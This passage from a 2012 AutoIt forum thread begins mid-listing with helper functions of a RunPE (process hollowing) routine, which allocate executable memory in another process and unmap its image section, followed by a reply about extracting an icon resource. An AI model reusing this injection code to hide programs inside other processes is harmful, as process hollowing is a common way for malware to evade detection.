NEXT $IRELATIVEMOVE += $ISIZEOFBLOCK WEND RETURN 1 ; ALL OK! ENDFUNC ;==>__RUNPE_FIXRELOC FUNC __RUNPE_ALLOCATEEXESPACEATADDRESS ($HPROCESS, $PADDRESS, $ISIZE) ; ALLOCATE LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "PTR", "VirtualAllocEx", _ "HANDLE", $HPROCESS, _ "PTR", $PADDRESS, _ "DWORD_PTR", $ISIZE, _ "DWORD", 0X1000, _ ; MEM_COMMIT "DWORD", 64) ; PAGE_EXECUTE_READWRITE ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN ; TRY DIFFERENTLY $ACALL = DLLCALL("KERNEL32.DLL", "PTR", "VirtualAllocEx", _ "HANDLE", $HPROCESS, _ "PTR", $PADDRESS, _ "DWORD_PTR", $ISIZE, _ "DWORD", 0X3000, _ ; MEM_COMMIT|MEM_RESERVE "DWORD", 64) ; PAGE_EXECUTE_READWRITE ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; UNABLE TO ALLOCATE ENDIF RETURN $ACALL[0] ENDFUNC ;==>__RUNPE_ALLOCATEEXESPACEATADDRESS FUNC __RUNPE_ALLOCATEEXESPACE ($HPROCESS, $ISIZE) ; ALLOCATE SPACE LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "PTR", "VirtualAllocEx", _ "HANDLE", $HPROCESS, _ "PTR", 0, _ "DWORD_PTR", $ISIZE, _ "DWORD", 0X3000, _ ; MEM_COMMIT|MEM_RESERVE "DWORD", 64) ; PAGE_EXECUTE_READWRITE ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; UNABLE TO ALLOCATE RETURN $ACALL[0] ENDFUNC ;==>__RUNPE_ALLOCATEEXESPACE FUNC __RUNPE_UNMAPVIEWOFSECTION ($HPROCESS, $PADDRESS) DLLCALL("NTDLL.DLL", "INT", "NtUnmapViewOfSection", _ "PTR", $HPROCESS, _ "PTR", $PADDRESS) ; CHECK FOR ERRORS ONLY IF @ERROR THEN RETURN SETERROR(1, 0, 0) ; FAILURE RETURN 1 ENDFUNC ;==>__RUNPE_UNMAPVIEWOFSECTION FUNC __RUNPE_ISWOW64PROCESS ($HPROCESS) LOCAL $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "IsWow64Process", _ "HANDLE", $HPROCESS, _ "BOOL*", 0) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; FAILURE RETURN $ACALL[2] ENDFUNC ;==>__RUNPE_ISWOW64PROCESS Link to comment Share on other sites More sharing options...
Skitty Posted February 11, 2012 Share Posted February 11, 2012 I tried, I really tried, but I just can't understand what the hell you are saying. I'm going to assume you want to extract a files icon resource, specifically the RT_GROUP_ICON resource right? If that's what you want, all you need is in the example I provided above. Else it would be better if you just post your message in your vernacular and let us decipher it. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now